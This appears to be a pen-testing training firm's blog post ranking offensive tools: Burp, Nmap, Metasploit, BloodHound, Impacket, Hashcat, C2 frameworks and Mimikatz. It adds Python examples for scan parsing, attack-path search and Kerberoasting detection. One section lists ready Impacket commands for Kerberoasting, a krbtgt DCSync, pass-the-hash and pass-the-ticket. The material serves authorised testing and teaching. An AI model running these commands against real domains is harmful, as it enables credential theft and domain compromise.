Tooling is the easy part. The hard part is knowing what to reach for and when. This is the toolkit our pen-test consultants actually use across BFSI and government engagements in 2026 — ranked by frequency of use, with notes on what each tool replaced and what's likely to replace it next.
1. Burp Suite Pro — the AppSec workhorse
Burp Suite is to web pentesting what AutoCAD is to architecture. Pro license (~₹35,000/year) is non-negotiable for serious work. Manual proxy intercept, Repeater, Intruder, Collaborator and the BApp store cover 95% of web testing use cases. Master it before anything else.
2. Nmap — the network reconnaissance reference
27 years old and still the network scanner you open first. The NSE script library is the underrated superpower — smb-vuln-ms17-010, ssl-enum-ciphers and http-enum each save hours per engagement. Free, ubiquitous, mandatory.
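To show what a consultant does with scan output once the NSE scripts have run, here is an added Python example (not from the original post, not Nmap's own code) that reads Nmap's -oX XML, builds an open-port inventory per host, and flags ports where ssl-enum-ciphers reports a legacy protocol or a cipher grade below A. The XML is a constructed sample trimmed to the elements the parser reads; a real scan's ssl-enum-ciphers output carries more nested fields, and the grade letters follow the script's own A-F scale.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout of `nmap -sV --script ssl-enum-ciphers -oX`
# output, trimmed to the elements read below. Not output from a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="https"/>
        <script id="ssl-enum-ciphers" output="(trimmed)">
          <table key="TLSv1.0">
            <table key="ciphers">
              <table><elem key="name">TLS_RSA_WITH_3DES_EDE_CBC_SHA</elem><elem key="strength">C</elem></table>
            </table>
          </table>
          <table key="TLSv1.2">
            <table key="ciphers">
              <table><elem key="name">TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256</elem><elem key="strength">A</elem></table>
            </table>
          </table>
          <elem key="least strength">C</elem>
        </script>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="https"/>
        <script id="ssl-enum-ciphers" output="(trimmed)">
          <table key="TLSv1.2"><table key="ciphers"/></table>
          <elem key="least strength">A</elem>
        </script>
      </port>
      <port protocol="tcp" portid="22">
        <state state="closed"/>
        <service name="ssh"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Protocol versions that should not be offered on a hardened service.
LEGACY_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}


def open_ports_by_host(xml_text):
    """Yield (address, <port> element) for every port Nmap reports as open."""
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        address = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                yield address, port


def open_ports(xml_text):
    """Inventory of the scan: {address: [(port, service_name), ...]}."""
    inventory = {}
    for address, port in open_ports_by_host(xml_text):
        service = port.find("service")
        name = service.get("name") if service is not None else "unknown"
        inventory.setdefault(address, []).append((int(port.get("portid")), name))
    return inventory


def tls_findings(xml_text):
    """Flag legacy protocol versions and weak cipher grades from ssl-enum-ciphers."""
    findings = []
    for address, port in open_ports_by_host(xml_text):
        script = port.find("script[@id='ssl-enum-ciphers']")
        if script is None:
            continue
        portid = int(port.get("portid"))
        # Top-level <table> children are keyed by protocol version.
        for table in script.findall("table"):
            if table.get("key") in LEGACY_PROTOCOLS:
                findings.append((address, portid, f"legacy protocol {table.get('key')} offered"))
        # The script's overall verdict is a single <elem key="least strength">.
        for elem in script.findall("elem"):
            if elem.get("key") == "least strength" and elem.text != "A":
                findings.append((address, portid, f"weakest cipher grade {elem.text}"))
    return findings


if __name__ == "__main__":
    for addr, ports in open_ports(SAMPLE_NMAP_XML).items():
        print(addr, ports)
    for finding in tls_findings(SAMPLE_NMAP_XML):
        print("FINDING", *finding)
```

Run it against a real `-oX` file by replacing SAMPLE_NMAP_XML with the file contents; the same two functions give you the asset list for the report and the TLS remediation items in one pass.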
3. Metasploit Framework — the exploitation library
Metasploit's modern role isn't 'point and click pwn' — it's a curated library of working exploits and post-exploitation modules. msfvenom for payload generation, auxiliary scanners for credential spraying, and the well-tested exploit modules for known CVEs. Skip the temptation to use it as a crutch on OSCP.
4. BloodHound — the Active Directory map
If your engagement involves Active Directory (most do), BloodHound is your second tool after Nmap. SharpHound for collection from Windows, bloodhound-python for collection from Linux, and the BloodHound GUI for visualizing attack paths. Without it, AD compromise is guesswork.
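To make the "attack path" idea concrete from the defender's side, here is an added Python example (not from the post, and not BloodHound's code) that runs a breadth-first search over a constructed toy graph written in BloodHound's edge vocabulary (MemberOf, AdminTo, HasSession, with HasSession pointing from the computer to the logged-on user) and reports which principals have any path to Domain Admins. The node names and edges are invented for the illustration; the useful output for remediation is the list of exposed principals and the specific edge on each path that breaks it.

```python
from collections import deque

# Constructed toy graph in BloodHound's edge vocabulary. Not a real collection.
# Edge direction follows BloodHound: user -MemberOf-> group, group -AdminTo-> host,
# host -HasSession-> user (the host holds that user's session/credentials).
EDGES = [
    ("alice@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "bob@CORP.LOCAL"),
    ("bob@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("carol@CORP.LOCAL", "MemberOf", "SALES@CORP.LOCAL"),
]
DOMAIN_ADMINS = "DOMAIN ADMINS@CORP.LOCAL"


def build_adjacency(edges):
    """Map each node to its outgoing (edge_kind, neighbour) pairs."""
    adjacency = {}
    for src, kind, dst in edges:
        adjacency.setdefault(src, []).append((kind, dst))
    return adjacency


def shortest_path(edges, start, target):
    """Breadth-first search; returns [(src, kind, dst), ...] or None if unreachable."""
    adjacency = build_adjacency(edges)
    parent = {start: None}          # node -> (previous node, edge kind)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for kind, nxt in adjacency.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, kind)
                queue.append(nxt)
    if target not in parent:
        return None
    path, current = [], target
    while parent[current] is not None:
        prev, kind = parent[current]
        path.append((prev, kind, current))
        current = prev
    return path[::-1]


def exposed_principals(edges, target):
    """Every node (other than the target) from which the target is reachable."""
    nodes = {n for src, _, dst in edges for n in (src, dst)}
    return sorted(n for n in nodes if n != target and shortest_path(edges, n, target))


if __name__ == "__main__":
    for step in shortest_path(EDGES, "alice@CORP.LOCAL", DOMAIN_ADMINS) or []:
        print(" -> ".join(step))
    print("exposed:", exposed_principals(EDGES, DOMAIN_ADMINS))
```

In this toy graph the fix is obvious once the path is printed: either the helpdesk group should not be local admin on a workstation where a Domain Admin logs in, or bob should not use his DA account on WS01. Real graphs have thousands of nodes, which is exactly why the GUI and its shortest-path queries exist.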
5. Impacket — the AD attack Swiss-army knife
The commands below are the Impacket calls we reach for most often; angle-bracket values are placeholders for the engagement's own credentials and hosts.
# Enumerate users
impacket-samrdump <user>:<pass>@<DC>
# Kerberoast
impacket-GetUserSPNs corp.local/<user>:<pass> -dc-ip <DC> -request
# DCSync
impacket-secretsdump -just-dc-user krbtgt corp.local/<admin>:<pass>@<DC>
# Pass-the-hash
impacket-psexec corp.local/<user>@<host> -hashes :<NTLM>
# Pass-the-ticket
export KRB5CCNAME=ticket.ccache
impacket-psexec -k -no-pass <host>.corp.local
6. CrackMapExec / NetExec — AD enumeration at scale
NetExec (the maintained successor to CrackMapExec) is what you reach for when you need to spray credentials, enumerate shares, run remote commands, or harvest password policies across a large internal network. The successor is faster and includes modules CrackMapExec didn't have.
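The Kerberoast step in section 5 has a well-known detection counterpart that any blue team you test against should have: a burst of Kerberos service-ticket requests (Windows Event ID 4769) with RC4 encryption (TicketEncryptionType 0x17) for many distinct SPNs from one account in a short window. As an added example (not from the post, not any vendor's rule), here is Python detection logic run over constructed log lines. Real 4769 events arrive as EVTX/XML; the pipe-delimited stand-in format, the field order, and the threshold and window values are assumptions for the illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed stand-in for exported 4769 events, one per line:
#   timestamp | event id | requesting account | service name (SPN) | encryption type
SAMPLE_EVENTS = r"""
2026-01-10T09:15:02|4769|CORP\alice|MSSQLSvc/db01.corp.local:1433|0x17
2026-01-10T09:15:03|4769|CORP\alice|HTTP/intranet.corp.local|0x17
2026-01-10T09:15:03|4769|CORP\alice|CIFS/files01.corp.local|0x17
2026-01-10T09:15:04|4769|CORP\alice|ldap/dc01.corp.local|0x17
2026-01-10T09:40:00|4769|CORP\bob|MSSQLSvc/db01.corp.local:1433|0x12
2026-01-10T09:41:00|4769|CORP\bob|HTTP/intranet.corp.local|0x12
2026-01-10T10:00:00|4769|CORP\carol|HTTP/intranet.corp.local|0x17
2026-01-10T11:00:00|4769|CORP\carol|CIFS/files01.corp.local|0x17
2026-01-10T11:00:05|4624|CORP\carol|-|-
""".strip().splitlines()

RC4_HMAC = "0x17"   # AES tickets are 0x11 (AES128) and 0x12 (AES256)


def parse_events(lines):
    """Parse the stand-in format; skip anything that is not a well-formed 4769."""
    for line in lines:
        fields = line.strip().split("|")
        if len(fields) != 5 or fields[1] != "4769":
            continue
        ts, _, account, spn, enc = fields
        yield {"ts": datetime.fromisoformat(ts), "account": account, "spn": spn, "enc": enc}


def detect_kerberoast(lines, threshold=3, window_seconds=300):
    """Return {account: [spn, ...]} for accounts that requested RC4 service
    tickets for >= threshold distinct SPNs within any window_seconds window."""
    requests = defaultdict(list)
    for ev in parse_events(lines):
        # Only RC4 tickets are cheap to crack; machine accounts ($) are excluded
        # here as a tuning choice, since they legitimately request many tickets.
        if ev["enc"] != RC4_HMAC or ev["account"].endswith("$"):
            continue
        requests[ev["account"]].append((ev["ts"], ev["spn"]))

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for account, reqs in requests.items():
        reqs.sort()
        # Slide a window starting at each request and count distinct SPNs in it.
        for i, (start, _) in enumerate(reqs):
            spns = {spn for ts, spn in reqs[i:] if ts - start <= window}
            if len(spns) >= threshold:
                flagged[account] = sorted(spns)
                break
    return flagged


if __name__ == "__main__":
    for account, spns in detect_kerberoast(SAMPLE_EVENTS).items():
        print(f"ALERT {account}: {len(spns)} RC4 service tickets -> {spns}")
```

Two tuning points matter in practice: accounts whose SPNs still allow RC4 should be moved to AES-only, which removes the 0x17 signal at the source, and the threshold should be set from a baseline of the environment's normal per-account ticket volume rather than guessed.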
7. Hashcat — the password-cracking standard
GPU-accelerated, supports every modern hash format including the ones you'll see in Kerberoasting (mode 13100), AS-REP (mode 18200), NTLMv2 (5600), and Kerberos AES (19700). RTX 4090 cluster cracks an 8-character mixed-case Kerberos hash in hours; weaker hashes fall in seconds.
8. Sliver / Mythic — the modern C2 frameworks
Cobalt Strike is still the gold standard for licensed red teams, but Sliver (open-source, Go-based) and Mythic (Python, modular) have matured into legitimate alternatives. For mature red-team work in 2026, you should be fluent in at least one. Avoid using leaked Cobalt Strike — it's both ethically questionable and easily detected by EDR.
9. Nuclei — templated vulnerability scanning
Nuclei runs YAML-based vulnerability templates against targets at high speed. Maintained by ProjectDiscovery, the public template library covers thousands of CVEs and misconfigurations. Indispensable for asset surveys and bug-bounty hunting; complements (not replaces) manual web testing.
10. Mimikatz — the credential extraction reference
Whether you use Mimikatz directly or via tools that wrap it (impacket, secretsdump, lsassy), understanding what Mimikatz does is essential to AD compromise. With LSASS protection enabled in Windows 11+, the techniques have evolved — but the concepts (pass-the-hash, OverPass-the-hash, Golden Ticket) remain the same.
Suggested learning order for newcomers
- Nmap — start here, every engagement
- Burp Suite — most engagement value per hour invested
- Metasploit — but as a library, not a magic wand
- Impacket + BloodHound — once you have AD-aware engagements
- Hashcat — when you need to crack what you've stolen
- Nuclei — when you need to scale vulnerability discovery
- Sliver / Mythic — once you need persistent operator-level C2
Macksofy's hands-on pentest tools workshop is one of several hands-on tracks Macksofy delivers across India and the UAE. CERT-In empanelled, OffSec/EC-Council authorized, with weekend cohorts and corporate batches.
